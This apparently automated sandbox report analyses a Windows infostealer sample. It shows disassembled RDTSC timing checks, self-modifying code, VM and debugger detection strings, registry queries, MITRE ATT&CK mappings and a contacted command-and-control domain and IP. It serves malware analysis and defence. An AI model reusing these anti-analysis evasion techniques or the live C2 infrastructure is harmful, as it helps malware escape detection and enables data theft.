Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75009A1 second address: 75009FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1C29045F16h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1C29045F10h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1C29045F0Dh 0x0000001f and ch, 00000056h 0x00000022 jmp 00007F1C29045F11h 0x00000027 popfd 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75009FC second address: 7500A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500A02 second address: 7500A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75509A5 second address: 75509D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1C28FAFD6Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75509D2 second address: 7550A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1C29045F11h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 jmp 00007F1C29045F14h 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f movsx edx, si 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530055 second address: 7530059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530059 second address: 7530076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530076 second address: 7530116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD77h 0x00000009 and esi, 089FA84Eh 0x0000000f jmp 00007F1C28FAFD79h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and esp, FFFFFFF0h 0x0000001b pushad 0x0000001c mov si, 7F4Fh 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 sub esp, 44h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F1C28FAFD6Ch 0x0000002d jmp 00007F1C28FAFD75h 0x00000032 popfd 0x00000033 pushad 0x00000034 mov al, ABh 0x00000036 jmp 00007F1C28FAFD73h 0x0000003b popad 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1C28FAFD75h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530116 second address: 7530162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1C29045F11h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 mov bx, si 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, bx 0x0000001f call 00007F1C29045F13h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530162 second address: 753020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD74h 0x00000009 and cx, 73D8h 0x0000000e jmp 00007F1C28FAFD6Bh 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F1C28FAFD70h 0x00000022 sub ch, 00000038h 0x00000025 jmp 00007F1C28FAFD6Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F1C28FAFD78h 0x00000031 add al, FFFFFF98h 0x00000034 jmp 00007F1C28FAFD6Bh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F1C28FAFD6Bh 0x00000045 or al, 0000005Eh 0x00000048 jmp 00007F1C28FAFD79h 0x0000004d popfd 0x0000004e mov esi, 581EE627h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753020F second address: 7530227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530227 second address: 753022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753022B second address: 7530231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530231 second address: 75302BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 3DBA8407h 0x00000008 pushfd 0x00000009 jmp 00007F1C28FAFD6Ch 0x0000000e adc si, C7B8h 0x00000013 jmp 00007F1C28FAFD6Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F1C28FAFD79h 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 mov ebx, esi 0x00000026 push esi 0x00000027 call 00007F1C28FAFD6Fh 0x0000002c pop ecx 0x0000002d pop edx 0x0000002e popad 0x0000002f mov edi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1C28FAFD71h 0x0000003b and eax, 60E60666h 0x00000041 jmp 00007F1C28FAFD71h 0x00000046 popfd 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75302BE second address: 75302CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75302CC second address: 7530314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+24h], 00000000h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F1C28FAFD6Bh 0x0000001c sub cx, FE4Eh 0x00000021 jmp 00007F1C28FAFD79h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530314 second address: 753032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753032B second address: 7530355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lock bts dword ptr [edi], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530355 second address: 7530359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530359 second address: 753035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753035D second address: 7530363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530363 second address: 7530398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F1C991B1E20h 0x0000000f pushad 0x00000010 mov ecx, 24803A5Dh 0x00000015 mov si, 1F59h 0x00000019 popad 0x0000001a pop edi 0x0000001b pushad 0x0000001c mov cx, 6091h 0x00000020 popad 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530398 second address: 75303AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303AC second address: 75303DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007F1C28FAFD6Dh 0x0000000b or al, 00000006h 0x0000000e jmp 00007F1C28FAFD71h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303DE second address: 75303E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303E2 second address: 75303F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303F5 second address: 753041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov dx, 2016h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esp, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1C29045F18h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753041D second address: 7530422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530422 second address: 7530432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 756082B second address: 7560862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007F1C28FAFD6Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007F1C28FAFD6Eh 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 mov eax, 05B4273Dh 0x0000001e mov bl, cl 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov ax, dx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508C6 second address: 75508CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508CC second address: 75508D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508D0 second address: 75508F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F1C29045F10h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508F2 second address: 75508F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508F6 second address: 75508FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508FC second address: 755090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 755090B second address: 7550964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1C29045F13h 0x00000016 sub eax, 611855DEh 0x0000001c jmp 00007F1C29045F19h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A3D second address: 7560A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A41 second address: 7560A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A47 second address: 7560A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A4D second address: 7560A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A51 second address: 7560A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A55 second address: 7560A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A64 second address: 7560A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A6A second address: 7560A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A70 second address: 7560A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A74 second address: 7560A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSpecial instruction interceptor: First address: F0B85E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSpecial instruction interceptor: First address: F0B7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSpecial instruction interceptor: First address: 10AB98F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_009A9980 rdtsc 1_2_009A9980
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_007C255D
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_007C29FF
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_007C255D
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: t6VDbnvGeN.exeBinary or memory string: Hyper-V RAW
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll", "pid": 5648 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6312 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6704 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 5684 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 5220 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 2516 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 2608 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6676 }, { "n
Source: t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_07540BDB Start: 07540E4C End: 07540BF71_2_07540BDB
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_075A095F Start: 075A0CAD End: 075A09DC1_2_075A095F
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_075A09AB Start: 075A0CAD End: 075A09DC1_2_075A09AB
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: NTICE
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: SICE
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_009A9980 rdtsc 1_2_009A9980
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: procmon.exe
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
t6VDbnvGeN.exe42%ReversingLabsWin32.Infostealer.Tinba
t6VDbnvGeN.exe53%VirustotalBrowse
t6VDbnvGeN.exe100%AviraTR/Crypt.TPM.Gen
t6VDbnvGeN.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
